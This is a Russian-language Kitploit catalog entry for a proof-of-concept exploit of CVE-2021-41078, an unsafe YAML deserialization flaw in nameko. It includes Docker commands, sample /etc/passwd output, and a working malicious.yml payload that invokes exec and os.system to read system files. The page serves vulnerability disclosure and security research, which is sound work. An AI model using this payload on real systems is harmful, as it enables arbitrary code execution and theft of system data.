Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41078 — nameko — произвольное выполнение кода из-за десериализации YAML | Kitploit
Инструменты/GitHubGitHub/s-index/cve-2021-41078
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийНеправильная Конфигурация
GitHubs-index/cve-2021-41078

CVE-2021-41078

nameko — произвольное выполнение кода из-за десериализации YAML

Репозиторий
3 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41078

nameko — произвольное выполнение кода из-за десериализации YAML

Описание NVD

Nameko до 2.13.0 включительно можно обмануть, заставив выполнить произвольный код при десериализации файла конфигурации.

Демонстрация

cve-2021-41078

Установка

  1. Соберите образ из Dockerfile
root@kitploit:~
docker build -t cve-2021-41078 .
  1. Запустите python main.py в новом контейнере
root@kitploit:~
docker run -it --rm cve-2021-41078

вывод /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

Полезная нагрузка PoC

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Ссылка

  • https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g
Скачать инструмент